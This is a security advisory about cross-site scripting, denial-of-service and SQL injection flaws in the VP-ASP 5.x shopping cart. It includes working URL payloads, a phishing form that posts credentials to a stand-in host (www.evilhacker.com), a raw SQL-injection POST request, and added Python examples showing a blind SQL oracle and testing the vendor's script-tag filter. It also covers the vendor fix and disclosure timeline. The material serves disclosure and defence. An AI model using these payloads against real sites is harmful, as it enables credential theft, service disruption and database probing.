[NT] VP-ASP Shopping Cart Multiple Vulnerabilities
From: SecuriTeam (support_at_securiteam.com)
Date: 06/16/04
To: list@securiteam.com Date: 16 Jun 2004 17:32:05 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
VP-ASP Shopping Cart Multiple Vulnerabilities
------------------------------------------------------------------------
SUMMARY
<http://www.vpasp.com/> Virtual Programming VP-ASP is "a shopping cart
application for e-commerce enabled sites. It is written in ASP, supports
the following databases: Access, MSSQL, MySQL on Windows and MySQL on
UNIX". Further review of the VP-ASP code, carried out after the vendor had
put a fix in place that filters out script tags, turned up additional
cross-site scripting and SQL injection vulnerabilities.
DETAILS
Vulnerable Systems:
* VP-ASP Shopping Cart version 5.x
Although the vendor added a subroutine that filters script tags from input,
the application remains highly susceptible to XSS and SQL injection. The
filter looks only for the literal string <script> (see the CleanseMessage
code under Vendor Status), so payloads built from other tags such as img,
meta and form, mutated spellings such as <scr!pt>, and URL-encoded input,
which the cart was found not to validate, pass straight through, and the
value is echoed into the page unencoded. Most if not all pages in VP-ASP
appear to be affected. Some examples are provided below:
Cross-site Scripting
http://[VICTIM]/vpasp/shopdisplayproducts.asp?id=5&cat=<img src="javascr!pt:alert('XSS')">
http://[VICTIM]/vpasp/shoperror.asp?msg=<img src="javascr!pt:alert('XSS')">
XSS is often dismissed as a matter of JavaScript pop-ups, but the injected
markup renders inside the shop's own page in the victim's browser, so the
same vector serves for far more than an alert box; the next two examples use
it for denial of service and for credential phishing.
Denial of Service
http://[VICTIM]/vpasp/shopdisplayproducts.asp?id=5&cat=<meta http-equiv='refresh'content='0'>
http://[VICTIM]/vpasp/shoperror.asp?msg=<meta http-equiv='refresh'content='0'>
A zero-delay meta refresh with no target URL reloads the current page as
soon as it renders, trapping the victim's browser in a reload loop and
sending a steady stream of requests to the server.
Parameter Tampering / Phishing
http://[VICTIM]/vpasp/shopdisplayproducts.asp?id=5&cat=<form action="http://www.evilhacker.com/save2db.asp" method="post">Username:<input name="username" type="text" maxlength="30"><br>Password:<input name="password" type="text" maxlength="30"><br><input name="login" type="submit" value="Login"></form>
The injected form is rendered inside the shop's own page, so whatever the
victim types into it is posted to the attacker's server (www.evilhacker.com
in the example) instead of to the shop.
SQL Injection
The POST request below appends the always-false condition AND 'a'>'z' to
the Processed0 and Processed1 fields of shopproductselect.asp. A difference
in the response between a true and a false appended condition shows that the
field is being evaluated as SQL rather than treated as a value:
POST /vpasp/shopproductselect.asp HTTP/1.0
Referer: http://[VICTIM]:80/vpasp/shopdisplayproducts.asp?id=6&cat=Groceries
Content-Length: 227
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: [VICTIM]
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ALT.COOKIE.NAME.2=8P.9.7080.2N2,20.B9N9P954OO4OM4,4; CustomCookie=TommyRyan

x1Feature1=28&x2Feature1=18&prodindex=3&quantity=1&quantity=1&quantity=1&action.x=5&action.y=5&Processed0=15+AND+'a'>'z'&Processed1=14+AND+'a'>'z'&x2Featurevalue1=19%2C+17%2C+18&Processed2=16&x1FeatureValue1=+2+dozen+%5B3.50%5D
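The following is an added example, not VP-ASP's code. The advisory shows the injected value (15 AND 'a'>'z') but not the query it lands in, so the vulnerable query here is a hypothetical one that concatenates the Processed0 field into a WHERE clause; it runs against a constructed SQLite table rather than the cart's database. It shows why the always-false condition is a useful probe (a true condition leaves the result unchanged, a false one empties it, and any SQL expression can be substituted for 'a'>'z'), and the validated, parameterised version that closes the hole.

```python
"""Boolean-based SQL injection through the Processed0 field (added example)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the cart's product table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (catalogid INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [(14, "Apples"), (15, "Bread"), (16, "Milk")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, processed0: str) -> list:
    """Hypothetical original: the form field is pasted into the SQL text,
    so whatever follows the number is parsed as part of the WHERE clause."""
    sql = "SELECT name FROM products WHERE catalogid = " + processed0
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn: sqlite3.Connection, processed0: str):
    """Hardened: the value must be a plain integer and is bound as a
    parameter, so it can only ever be compared, never parsed as SQL.
    Returns None when the input is rejected."""
    try:
        catalogid = int(processed0)
    except ValueError:
        return None
    sql = "SELECT name FROM products WHERE catalogid = ?"
    return [row[0] for row in conn.execute(sql, (catalogid,))]


def blind_oracle(conn: sqlite3.Connection, base_id: str, condition: str) -> bool:
    """What the advisory's payload is probing for: append AND <condition>
    to a known-good id and watch whether the product still comes back."""
    return len(lookup_vulnerable(conn, f"{base_id} AND {condition}")) > 0


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "15"))                 # ['Bread']
    print(lookup_vulnerable(db, "15 AND 'a'>'z'"))     # []
    print(blind_oracle(db, "15", "'a'<'z'"))           # True
    # the same oracle answers questions about the database itself
    print(blind_oracle(db, "15", "(SELECT count(*) FROM products) > 2"))  # True
    print(lookup_parameterized(db, "15 AND 'a'>'z'"))  # None (rejected)
```

The parameterised version also rejects the value rather than silently returning nothing, so a request carrying SQL in a numeric field can be logged as an attack rather than lost as an empty search.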
Vendor Status:
The vendor's current workaround is to add one line to the CleanseMessage
subroutine in shop$db.asp so that a message which passes the <script> check
is HTML-encoded before it is used. Note that the check itself still matches
only the literal string <script>, so none of the img, meta, form or <scr!pt>
payloads above are caught by it; the protection comes from the added
Server.HTMLEncode call, which renders whatever markup reaches the output
inert, and only on pages that pass their parameters through CleanseMessage
before echoing them. VBScript passes arguments by reference by default, so
the encoded value is returned to the caller through msg. This addresses the
cross-site scripting vectors only; HTML encoding does nothing for the SQL
injection above, which needs validated and parameterised query input.
Original:
Sub CleanseMessage (msg, rc)
    dim lmsg, pos
    lmsg = lcase(msg)
    pos = instr(lmsg, "<script>")   ' literal substring match only
    If pos > 0 then
        rc = 4                       ' flag the message for the caller
    else
        rc = 0
    end if
end sub
Modified:
Sub CleanseMessage (msg, rc)
    dim lmsg, pos
    lmsg = lcase(msg)
    pos = instr(lmsg, "<script>")
    If pos > 0 then
        rc = 4
    else
        rc = 0
        msg = server.htmlencode(msg) ' added line: encode markup so it is displayed, not parsed
    end if
end sub
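The following is an added example that is not VP-ASP's code. It re-creates in Python the logic of the VBScript subroutine above (an instr() search for the literal string "<script>" in the lower-cased message), once as originally shipped and once with the vendor's added Server.HTMLEncode line, and runs the advisory's payloads from the Details section through both. Python's html.escape stands in for Server.HTMLEncode, and the payload strings are constructed from the advisory's examples (the form payload is shortened).

```python
"""Model of the CleanseMessage blocklist, before and after the fix (added example)."""
import html

REJECT = 4   # rc value the VBScript sets when "<script>" is found
ACCEPT = 0


def cleanse_message_original(msg: str) -> tuple:
    """Original filter: rc=4 only if '<script>' appears verbatim (case-folded)
    in the message; anything else is handed back untouched."""
    if "<script>" in msg.lower():
        return msg, REJECT
    return msg, ACCEPT


def cleanse_message_fixed(msg: str) -> tuple:
    """Vendor workaround: same blocklist, but a message that passes it is
    HTML-encoded before it is returned (html.escape encodes & < > " and ')."""
    if "<script>" in msg.lower():
        return msg, REJECT
    return html.escape(msg, quote=True), ACCEPT


# Payloads taken from the advisory, plus the mutated spelling its timeline mentions.
ADVISORY_PAYLOADS = {
    "xss_img": "<img src=\"javascr!pt:alert('XSS')\">",
    "dos_meta": "<meta http-equiv='refresh'content='0'>",
    "phish_form": '<form action="http://www.evilhacker.com/save2db.asp" method="post">'
                  'Username:<input name="username" type="text"></form>',
    "mutated_script": "<scr!pt>alert('XSS')</scr!pt>",
}


def has_live_markup(s: str) -> bool:
    """Rough check used only by this example: a raw '<' ... '>' pair means
    the browser will parse a tag out of the string."""
    return "<" in s and ">" in s


def evaluate(filter_fn) -> dict:
    """Run each payload through filter_fn; report whether it was rejected
    and, if accepted, whether live markup survived into the output."""
    report = {}
    for name, payload in ADVISORY_PAYLOADS.items():
        out, rc = filter_fn(payload)
        report[name] = {
            "rejected": rc == REJECT,
            "live_markup": rc == ACCEPT and has_live_markup(out),
        }
    return report


if __name__ == "__main__":
    for label, fn in (("original", cleanse_message_original),
                      ("fixed", cleanse_message_fixed)):
        print(label)
        for name, r in evaluate(fn).items():
            print(f"  {name:15s} rejected={r['rejected']!s:5s} live_markup={r['live_markup']}")
```

Run as written, the original filter rejects none of the four payloads and every one of them reaches the output as live markup; the fixed version rejects none of them either, but none survives as markup, which is why the encoding line, not the blocklist, is the part of the workaround that matters.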
Disclosure Timeline
05/14/2004 - Vulnerability found
05/26/2004 - Reported to vendor
06/09/2004 - Contacted vendor again
06/10/2004 - Sent the vendor a document showing that the block does not catch <scr!pt>
06/11/2004 - Vendor researching a quick fix for current customers
06/12/2004 - Vendor released a vulnerability fix without Tom Ryan's testing and without credit for the research:
http://www.vpasp.com/virtprog/info/faq_securityfixes.htm
06/12/2004 - Tom Ryan tested the VP-ASP cart; it failed to validate URL-encoded input
06/13/2004 - Worked with Virtual Programming to fix all problems
06/14/2004 - Tom Ryan's detailed vulnerability release
ADDITIONAL INFORMATION
The information has been provided by Thomas Ryan <mailto:tommy@providesecurity.com>.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.